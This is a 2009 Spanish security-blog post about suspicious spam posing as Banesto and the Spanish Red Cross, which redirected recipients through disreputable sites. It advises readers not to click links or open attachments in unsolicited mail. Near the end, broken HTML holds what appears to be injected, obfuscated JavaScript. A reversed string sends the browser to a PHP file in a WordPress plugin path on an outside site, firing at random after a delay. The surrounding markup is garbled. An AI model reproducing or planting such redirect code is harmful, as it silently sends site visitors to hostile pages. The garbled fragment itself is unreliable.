Spams sospechosos de ser pruebas piloto de Phishings relativos al BANESTO y a la CRUZ ROJA DE ESPAÑA
segun investigación de la fuente abajo indicada, se han recibido dos tipos de mails, uno aparentemente del BANESTO (BANCO ESPAÑOL DE CREDITO) y otro de la CRUZ ROJA (evidentemente falsos) que redirigían al usuario hacia 3 o 4 webs de mala reputación, aunque finalmente llegaban a la web de dicho banco y de la Cruz Roja…
Una vez mas insistimos en que NO SE DEBEN EJECUTAR FICHEROS ANEXADOS A MAILS, NI PULSAR EN LINKS NI EN IMAGENES DE MAILS NO SOLICITADOS !!!
Las capturas de pantalla de estos dos correos son las siguientes:
Captura #2: Con remitente Cruz Roja – spam(?)
Revisando el código fuente del HTML del correo, después de la parte visible al usuario, aparecen decenas de lineas con cientos de palabras, que no son visibles para el receptor. Un intento evidente para evadir filtros anti-spam.
Antecedentes de los distintos dominios a los que redirigen la prueba de laboratorio, aparecen spams de empresas de “publicidad” que alegan hacer las cosas dentro de la ley.
Sin embargo, sobre la empresa del banner “Spruce Mountain Networks” hay apenas una o dos referencias de otros correos spam…
El receptor de estos mensajes en Buenos Aires nunca fue cliente del banco ni aporto fondos a la Cruz Roja de España.
Si bien no se ha podido detectar ninguna actividad claramente maliciosa, sería muy extraño que alguna de estas dos instituciones hubieran contratado dicho medio para publicitar. Consultadas ambas instituciones al respecto no se ha recibido respuesta por ahora, pero damos por descartado que tuvieran conocimiento de ello.
Cabe resaltar que el mail con remitente de la Cruz Roja, apunta a una dirección como esta:
Hay la sospecha que estos correos hayan sido un “globo de ensayo” de spammers o delincuentes, ya sea para probar efectividad de algún método en desarrollo, o para sumar clicks de los destinatarios u otros sistemas que estén probando spammers delincuentes.
Si se recibe algun mail de entidades reconocidas, aunque inspiren confianza, mejor contestar escribiendo nosotros la dirección web de sus sitios, nunca haciendo clic en sus links.
Fuente
Un buen trabajo de investigacion de Cristian y Raúl, de la Redacción de Segu-Info, a los que se les reconoce y agradece su información.
saludos
ms, 5-12-2009
NOTA: Aprovechamos para sugerir la instalacion del SiteAdvisor de McAfee, que bloquea o avisa sobre acceso a conocidas web fraudulentas, y que nos ha salvado de caer en malas manos mas de una vez 🙂
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.jpg”>Captura #1: Con remitente Banco Banes<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=link}
Los comentarios están cerrados.